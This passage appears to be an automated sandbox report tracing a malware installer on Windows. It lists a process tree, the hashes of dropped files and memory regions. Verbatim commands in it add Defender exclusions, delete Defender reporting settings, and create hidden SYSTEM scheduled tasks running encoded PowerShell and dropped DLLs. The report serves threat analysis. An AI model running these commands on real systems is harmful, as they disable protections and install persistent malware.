                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu /t REG_DWORD /d 0 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2088
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YSrBLfWUtIHnuviW /t REG_DWORD /d 0 /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4112
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YSrBLfWUtIHnuviW /t REG_DWORD /d 0 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4316
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /CREATE /TN "gJeYQxpJy" /SC once /ST 05:46:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                      2⤵
                                      • System Location Discovery: System Language Discovery
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:1832
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /run /I /tn "gJeYQxpJy"
                                      2⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2080
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /DELETE /F /TN "gJeYQxpJy"
                                      2⤵
                                        PID:4852
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /CREATE /TN "MFUxwpyluZmBswWip" /SC once /ST 00:38:15 /RU "SYSTEM" /TR "\"C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\hfSpQDe.exe\" 18 /site_id 525403 /S" /V1 /F
                                        2⤵
                                        • Drops file in Windows directory
                                        • System Location Discovery: System Language Discovery
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:3800
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /run /I /tn "MFUxwpyluZmBswWip"
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5104
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                      1⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3756
                                      • C:\Windows\system32\gpupdate.exe
                                        "C:\Windows\system32\gpupdate.exe" /force
                                        2⤵
                                          PID:2500
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                        1⤵
                                          PID:2576
                                        • C:\Windows\system32\gpscript.exe
                                          gpscript.exe /RefreshSystemParam
                                          1⤵
                                            PID:3312
                                          • C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\hfSpQDe.exe
                                            "C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\hfSpQDe.exe" 18 /site_id 525403 /S
                                            1⤵
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Drops Chrome extension
                                            • Drops desktop.ini file(s)
                                            • Drops file in System32 directory
                                            • Drops file in Program Files directory
                                            • System Location Discovery: System Language Discovery
                                            • Modifies data under HKEY_USERS
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:2796
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /DELETE /F /TN "bKwcWZekAnYWEgmozo"
                                              2⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:5012
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                              2⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2600
                                              • C:\Windows\SysWOW64\reg.exe
                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2556
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                              2⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:440
                                              • C:\Windows\SysWOW64\reg.exe
                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:4668
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ZUXSmeDRU\XUeoTo.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "SEVCueFJyRflUhU" /V1 /F
                                              2⤵
                                              • Drops file in Windows directory
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:3392
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /CREATE /TN "SEVCueFJyRflUhU2" /F /xml "C:\Program Files (x86)\ZUXSmeDRU\YNlMMpi.xml" /RU "SYSTEM"
                                              2⤵
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:4924
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /END /TN "SEVCueFJyRflUhU"
                                              2⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1328
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /DELETE /F /TN "SEVCueFJyRflUhU"
                                              2⤵
                                                PID:5000
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /CREATE /TN "iJzencGmrLwIJF" /F /xml "C:\Program Files (x86)\UBqYudvSNocU2\LrwIkYD.xml" /RU "SYSTEM"
                                                2⤵
                                                • System Location Discovery: System Language Discovery
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:224
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /CREATE /TN "qYXqheuptEbIX2" /F /xml "C:\ProgramData\hrOORTLiECQfZJVB\ZYSQGOM.xml" /RU "SYSTEM"
                                                2⤵
                                                • System Location Discovery: System Language Discovery
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:3424
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /CREATE /TN "JDYpgkNAOwNKhospY2" /F /xml "C:\Program Files (x86)\xonCRuklPFipnPeqKpR\jADgsbp.xml" /RU "SYSTEM"
                                                2⤵
                                                • System Location Discovery: System Language Discovery
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:896
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /CREATE /TN "hPTErtfTjvBJRSQKVfY2" /F /xml "C:\Program Files (x86)\oXjeNNLqKAotC\MibJyGd.xml" /RU "SYSTEM"
                                                2⤵
                                                • System Location Discovery: System Language Discovery
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4792
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /CREATE /TN "NGWtXtGwgKKYsphzV" /SC once /ST 06:00:38 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\YSrBLfWUtIHnuviW\EcCrdSKa\UNZSDSK.dll\",#1 /site_id 525403" /V1 /F
                                                2⤵
                                                • Drops file in Windows directory
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4720
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /run /I /tn "NGWtXtGwgKKYsphzV"
                                                2⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2372
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                2⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1980
                                                • C:\Windows\SysWOW64\reg.exe
                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                  3⤵
                                                    PID:4744
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3496
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                    3⤵
                                                      PID:2640
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /DELETE /F /TN "MFUxwpyluZmBswWip"
                                                    2⤵
                                                      PID:2704
                                                  • C:\Windows\system32\rundll32.EXE
                                                    "C:\Windows\system32\rundll32.EXE" "C:\Windows\Temp\YSrBLfWUtIHnuviW\EcCrdSKa\UNZSDSK.dll",#1 /site_id 525403
                                                    1⤵
                                                      PID:4060
                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                        "C:\Windows\system32\rundll32.EXE" "C:\Windows\Temp\YSrBLfWUtIHnuviW\EcCrdSKa\UNZSDSK.dll",#1 /site_id 525403
                                                        2⤵
                                                        • Checks BIOS information in registry
                                                        • Loads dropped DLL
                                                        • System Location Discovery: System Language Discovery
                                                        • Enumerates system info in registry
                                                        • Modifies data under HKEY_USERS
                                                        PID:2724
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /DELETE /F /TN "NGWtXtGwgKKYsphzV"
                                                          3⤵
                                                            PID:1520

                                                      Network

                                                      MITRE ATT&CK Enterprise v15

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\Program Files (x86)\UBqYudvSNocU2\LrwIkYD.xml

                                                        Filesize

                                                        2KB

                                                        MD5

                                                        964826594ae92c3dee02818053f12c0a

                                                        SHA1

                                                        2f290a361fa973e6e6b6f3cf30a88c5113432575

                                                        SHA256

                                                        8ca4d4067a833d8399cebb09d3b629b34fe24a9daa90f7d5ba79d72a844eaaea

                                                        SHA512

                                                        7f76f07d356f0911837f592bca779fbfce1494dc1ea2a6637c3d02c8fa3d29166186ea0c006722485994b545f552ede8f0d0e32c8af9d408bc00906b38080b9e

                                                      • C:\Program Files (x86)\ZUXSmeDRU\YNlMMpi.xml

                                                        Filesize

                                                        2KB

                                                        MD5

                                                        368ecf3ab630770adbe01aee6a8afd73

                                                        SHA1

                                                        a147924dd9b5cfd2146df2560d1d021e8f410740

                                                        SHA256

                                                        89db2fffcf6f4c04a966358ed971c8ec6c5a39bc2904c0325b98af8b20cd4ad7

                                                        SHA512

                                                        17434b2b6bd2abb4b84d19de5fbfda3cace7878fd37adc47bb862b9dca6954bae567f3553d17715621cfe810cc8734480a57234d3cbb95d8f122525b7a0f57dd

                                                      • C:\Program Files (x86)\oXjeNNLqKAotC\MibJyGd.xml

                                                        Filesize

                                                        2KB

                                                        MD5

                                                        3e612949f5cdbd113c5f5f052d195c0c

                                                        SHA1

                                                        db3293c72c8a67136c693943520b371e561d9f3c

                                                        SHA256

                                                        fec1858b1631855d3b829471261ec6d7845773968fa87ea30a5a092a894fcf26

                                                        SHA512

                                                        ed2b5c9cddcf4277e6e67033759ef956863a44f07a60c28d408024449c6607bd7db4993afca1664521bfc50ec6bb8713a65221abfba94d296bc45cc5dab6b4b9

                                                      • C:\Program Files (x86)\xonCRuklPFipnPeqKpR\jADgsbp.xml

                                                        Filesize

                                                        2KB

                                                        MD5

                                                        af3f5a7843de9836669b874fd235ef54

                                                        SHA1

                                                        f02c6d878c9de2f69172aa22e7f840d982379163

                                                        SHA256

                                                        5623685dfee4690425f71d955748c0aa27f350aadda223514414f761425b6548

                                                        SHA512

                                                        6a17dc9d5c24be6fef0f9c18554a6f089962d6055703768872094b5b6e2c69bef282286d7665189b093de7c3d313deb5b552c6b7126ce74a0173ab1217a7ea6b

                                                      • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                        Filesize

                                                        1.1MB

                                                        MD5

                                                        cec7983ff7fcb772fc2d9e9777a4c603

                                                        SHA1

                                                        eff86250bdc1ab28bdb3776c771616403885d85e

                                                        SHA256

                                                        f6458e3750af7de61af4f26c9a2acfa1b57f7e0bbc9d61bb032f4906b5a5d9f1

                                                        SHA512

                                                        9953192eb80d7343bc825de47d4e811df534b6370a472dd033bb6fc9d6484fd1cf1aefbe801c46564270f4263c847a5be10d7a5499bb09a1bccac8a4f95f57de

                                                      • C:\ProgramData\hrOORTLiECQfZJVB\ZYSQGOM.xml

                                                        Filesize

                                                        2KB

                                                        MD5

                                                        dc0e074d1b9180a769c7c055a1c123d0

                                                        SHA1

                                                        524253fc61b2d188fa208538ce02ad50c9cd4ee1

                                                        SHA256

                                                        a6a71ee7b0788925e47bdcb0e8de2712009e420fea84519804e9773cc8cd6ab4

                                                        SHA512

                                                        797bc6ed5ea7e720d400d3a5ad220936a67f33bb9486e6d7f2c7927f2f95cc8be36a635a4598aa756e8f95be5468b3ce9bc958f753e3be2e65ea69133e2e6690

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                        Filesize

                                                        187B

                                                        MD5

                                                        2a1e12a4811892d95962998e184399d8

                                                        SHA1

                                                        55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                        SHA256

                                                        32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                        SHA512

                                                        bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                        Filesize

                                                        136B

                                                        MD5

                                                        238d2612f510ea51d0d3eaa09e7136b1

                                                        SHA1

                                                        0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                        SHA256

                                                        801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                        SHA512

                                                        2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                        Filesize

                                                        150B

                                                        MD5

                                                        0b1cf3deab325f8987f2ee31c6afc8ea

                                                        SHA1

                                                        6a51537cef82143d3d768759b21598542d683904

                                                        SHA256

                                                        0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                        SHA512

                                                        5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                        Filesize

                                                        2KB

                                                        MD5

                                                        713ad359b75fe6d947468ec1825202b9

                                                        SHA1

                                                        19dcd19f18a2ad6deb581451aad724bd44a592a4

                                                        SHA256

                                                        56572269ec031c63d966c6d3b4712600b908d38826c59c0f9a8225d0a783e9f4

                                                        SHA512

                                                        4df344dec422bed85b186909dc7f9c35126b3bb45e100f18fb95b4a9943ace242479adf5f0194b054d38b67032498f897a5a54b49026efee0c4797cb5a5e54e8

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        64B

                                                        MD5

                                                        5caad758326454b5788ec35315c4c304

                                                        SHA1

                                                        3aef8dba8042662a7fcf97e51047dc636b4d4724

                                                        SHA256

                                                        83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

                                                        SHA512

                                                        4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

                                                      • C:\Users\Admin\AppData\Local\Temp\7zS9FF9.tmp\Install.exe

                                                        Filesize

                                                        6.3MB

                                                        MD5

                                                        ded964e022a37d93d434091ec75f9881

                                                        SHA1

                                                        e89a551ac1f19dc3838e21157667e2f98d84d06b

                                                        SHA256

                                                        9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde

                                                        SHA512

                                                        13f0873cc797eeb7a4a1606ea3dc95f0d1f96bf1dfad286ee3959f0b885426214c24c1ea2422a46191f78063b75200d7ad9065d5654a7758086a9e41f7cf75af

                                                      • C:\Users\Admin\AppData\Local\Temp\7zSA22B.tmp\Install.exe

                                                        Filesize

                                                        6.8MB

                                                        MD5

                                                        6cb87a9fc7dc1f2a5410fd428f5460f0

                                                        SHA1

                                                        2885b2d28a333d7bd9d6488ba2bf7312fc811e3a

                                                        SHA256

                                                        fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52

                                                        SHA512

                                                        4c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269

                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mpeotdnj.1ej.ps1

                                                        Filesize

                                                        60B

                                                        MD5

                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                        SHA1

                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                        SHA256

                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                        SHA512

                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hohja4eo.default-release\prefs.js

                                                        Filesize

                                                        11KB

                                                        MD5

                                                        5f8ce6061591af9a73da34517f072f6d

                                                        SHA1

                                                        5855b2692125f420e359cb69decf2b744f90fb8d

                                                        SHA256

                                                        71588c68c69f5b57670fbaa0d0f3d7dd043252dcff65ce963155a4d1af2409f9

                                                        SHA512

                                                        dd85386013084b79e52bb35872c509e7fbc96d555881e997142210d8757707c75be7eca4cbe4a0551ce0b8a08cda63d98de2a1ba3411e9833575b7fd55f169f3

                                                      • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                        Filesize

                                                        1KB

                                                        MD5

                                                        c3c8c7edc7bdeb3c512771a68bd878ab

                                                        SHA1

                                                        0be3d1e296640d418a890041fd5d3b12ceea71df

                                                        SHA256

                                                        136776ac6adcb472e0ed37035f6f773df3fb5d347f017fea3f1f2af0b103e5f2

                                                        SHA512

                                                        dc9bdc7f504cefb344dbeaaf11f924c4cebaefa4dcaa02fdff2baca56f4864c4f81a49c525db7c9f7cc2cfa306f4c8bdfbce1043b9182d94627de76d1805e33f

                                                      • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        11KB

                                                        MD5

                                                        020f435a5b468782c17727ae90899a58

                                                        SHA1

                                                        dde0865a1760710ed2a50a8286cc12b4d665ccfd

                                                        SHA256

                                                        0bbcf60234e68fb0d8fbdfe4c856c2fa6170ecd013a978b340d44c45d891d6ef

                                                        SHA512

                                                        761c704bceec11021dcc72292758ad9b4d70d9bf7e9edef460fdb4851b345e9eb35da429f57507b6889bafed550a600351466eb442b111d8fbb12f9eb7dda6d4

                                                      • C:\Windows\Temp\YSrBLfWUtIHnuviW\EcCrdSKa\UNZSDSK.dll

                                                        Filesize

                                                        6.2MB

                                                        MD5

                                                        8cfc8a5c654e986ab3de168ecbc93096

                                                        SHA1

                                                        a745e47565aed873f5f5264543479266d8918a64

                                                        SHA256

                                                        2996bcb9d033414f6dce67539a71bf29250dc19a66424944065bf5cdf285500a

                                                        SHA512

                                                        99398bbaed5f5547331f21c9e9b2eda5b4842ad88b950f1cce4a04202d45a25a83fdd1593f6b15d05fdee7ba4872ba287b4a5e5c1a0c8c337311eb8b3326dac3

                                                      • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                        Filesize

                                                        5KB

                                                        MD5

                                                        8a23e7417f0e171228321494ead8e634

                                                        SHA1

                                                        929d7a156f7bdff24875772e56f69d2b0715a59f

                                                        SHA256

                                                        fc2c39e0dc4a7e8e5f576cfef0253ef6adca13617ea7983b0f0a0ca2ddab8ef3

                                                        SHA512

                                                        248680d761e09aeac8580416201ccc06e21258f98a9db3187a29ff525896cc79cd91827f2b52a34718f204dabe95d2311314439f74c0cb3019f4b89ce92b0037

                                                      • C:\Windows\system32\GroupPolicy\gpt.ini

                                                        Filesize

                                                        268B

                                                        MD5

                                                        a62ce44a33f1c05fc2d340ea0ca118a4

                                                        SHA1

                                                        1f03eb4716015528f3de7f7674532c1345b2717d

                                                        SHA256

                                                        9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

                                                        SHA512

                                                        9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

                                                      • memory/396-31-0x0000000010000000-0x0000000010B5D000-memory.dmp

                                                        Filesize

                                                        11.4MB

                                                      • memory/728-35-0x0000000004120000-0x00000000047EA000-memory.dmp

                                                        Filesize

                                                        6.8MB

                                                      • memory/728-50-0x0000000004F20000-0x0000000004F6C000-memory.dmp

                                                        Filesize

                                                        304KB

                                                      • memory/728-48-0x0000000004A40000-0x0000000004D97000-memory.dmp

                                                        Filesize

                                                        3.3MB

                                                      • memory/728-49-0x0000000004ED0000-0x0000000004EEE000-memory.dmp

                                                        Filesize

                                                        120KB

                                                      • memory/728-34-0x00000000038B0000-0x00000000038E6000-memory.dmp

                                                        Filesize

                                                        216KB

                                                      • memory/728-37-0x0000000004860000-0x00000000048C6000-memory.dmp

                                                        Filesize

                                                        408KB

                                                      • memory/728-36-0x0000000003FA0000-0x0000000003FC2000-memory.dmp

                                                        Filesize

                                                        136KB

                                                      • memory/728-38-0x00000000048D0000-0x0000000004936000-memory.dmp

                                                        Filesize

                                                        408KB

                                                      • memory/2724-317-0x0000000001FC0000-0x0000000002B1D000-memory.dmp

                                                        Filesize

                                                        11.4MB

                                                      • memory/2796-93-0x0000000003720000-0x00000000037A5000-memory.dmp

                                                        Filesize

                                                        532KB

                                                      • memory/2796-286-0x0000000003990000-0x0000000003A06000-memory.dmp

                                                        Filesize

                                                        472KB

                                                      • memory/2796-129-0x0000000003920000-0x0000000003988000-memory.dmp

                                                        Filesize

                                                        416KB

                                                      • memory/2796-297-0x0000000004550000-0x000000000460A000-memory.dmp

                                                        Filesize

                                                        744KB

                                                      • memory/3732-21-0x0000014DB97D0000-0x0000014DB97F2000-memory.dmp

                                                        Filesize

                                                        136KB

                                                      • memory/4528-12-0x0000000010000000-0x0000000010B5D000-memory.dmp

                                                        Filesize

                                                        11.4MB